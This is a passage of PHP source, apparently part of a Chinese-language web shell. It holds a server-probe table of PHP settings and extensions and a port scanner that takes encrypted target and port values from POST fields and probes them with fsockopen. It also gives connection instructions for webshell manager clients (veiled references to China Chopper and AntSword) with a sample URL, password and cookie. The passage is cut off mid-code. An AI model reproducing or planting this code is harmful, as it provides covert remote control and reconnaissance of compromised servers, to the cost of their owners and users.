[post_max_size]" , self::getCfg("post_max_size")] , ["允许最大上传
[upload_max_filesize]" , $upsize] , ["程序最长运行时间
[max_execution_time]" , self::getCfg("max_execution_time") . "秒"] , ["禁用函数
[disable_functions]" , $dis_func] , ["程序信息函数
[phpinfo()]" , $phpinfo] , ["目前还有空余空间
[diskfreespace]" , intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'] , ["GZ压缩文件支持
[zlib]" , self::funAlive("gzclose")] , ["ZIP压缩文件支持
[ZipArchive(php_zip)]" , self::funAlive("zip_open")] , ["IMAP电子邮件系统" , self::funAlive("imap_close")] , ["XML解析" , self::funAlive("xml_set_object")] , ["FTP登陆" , self::funAlive("ftp_login")] , ["Session支持" , self::funAlive("session_start")] , ["Socket支持" , self::funAlive("fsockopen")] , ["MySQL数据库" , self::funAlive("mysql_close")] , ["MSSQL数据库" , self::funAlive("mssql_close")] , ["Postgre SQL数据库" , self::funAlive("pg_close")] , ["SQLite数据库" , self::funAlive("sqlite_close")] , ["Oracle数据库" , self::funAlive("ora_close")] , ["Oracle 8数据库" , self::funAlive("OCILogOff")] , ["SyBase数据库" , self::funAlive("sybase_close")] , ["Hyperwave数据库" , self::funAlive("hw_close")] , ["InforMix数据库" , self::funAlive("ifx_close")] , ["FilePro数据库" , self::funAlive("filepro_fieldcount")] , ["DBA/DBM连接" , self::funAlive("dba_close") . " / " . self::funAlive("dbmclose")] , ["ODBC/dBASE连接" , self::funAlive("odbc_close") . " / " . self::funAlive("dbase_close")] , ["PREL相容语法
[PCRE]" , self::funAlive("preg_match")] , ["PDF支持" , self::funAlive("pdf_close")] , ["图形处理
[GD Library]" , self::funAlive("imageline")] , ["SNMP网络管理协议" , self::funAlive("snmpget")] , ]; $result .= '
| ' . $info[$i][0] . ' | ' . $info[$i][1] . ' |
Hello world
';"; $result = <<扫描IP
端口号
常见端口:20-30,53,67-69,80-90,110,111,137-139,143,161,162,389,445,443,512-514,873,1099,1194,1352,1433,1434,1500,1521,1723,2049,2082,2083,2181,2375,2601,2604,3128,3312,3311,3306,3389,3690,4750,4848,5000,5432,5632,5900-5902,5984,6379,7001-7010,7778,8000-8010,8069,8080-8090,8440-8450,9000-9010,9043,9080-9090,9200-9300,10000-10002,11211,27017,27018,50000,50030,50070
END; if ((!empty($GLOBALS['_POST']['content'])) && (!empty($GLOBALS['_POST']['method']))) { $ports_array = explode(',' , Decrypt::run($GLOBALS['_POST']['method'])); $ports = []; foreach ($ports_array as $value) { if (preg_match('/(\d+)-(\d+)/' , $value , $tmp)) { for ($j = $tmp[1]; $j < $tmp[2] + 1; $j ++) { $ports[] = (int) $j; } } else { $ports[] = (int) $value; } } $open_result = ''; $close_result = ''; for ($i = 0; $i < count($ports); $i ++) { if ($ports[$i]) { $fp = @fsockopen(Decrypt::run($GLOBALS['_POST']['content']) , $ports[$i] , $errno , $errstr , 2); if ($fp) { $open_result .= "$ports[$i]"; } else { $close_result .= "$ports[$i]"; } } ob_flush(); flush(); } $result .= "开放端口
$open_result
关闭端口
$close_result
本模块可使用切菜使用的工具、来自德玛西亚蚂蚁的武器等管理端进行连接
连接地址:
http://website.com/script.php?action=cxk&e=cmVfc19ldF9hX2xpX2Fz密码:
singdancerapbasketball连接配置:
Cookie:PHPSESSIDS=5dce171e2fab0814d67170153804f937' . self::fileAction($GLOBALS['_POST']['files'] , $GLOBALS['_POST']['type'] , $GLOBALS['_POST']['inver'] , $REAL_DIR . '/') . '
'; } $NUM_D = $NUM_F = 0; if (!$_SERVER['SERVER_NAME']) $GET_URL = ''; else $GET_URL = 'http://' . $_SERVER['SERVER_NAME'] . '/'; $ROOT_DIR = self::fileMode(); $encode_path = base64_encode(urlencode($path)); $result .= <<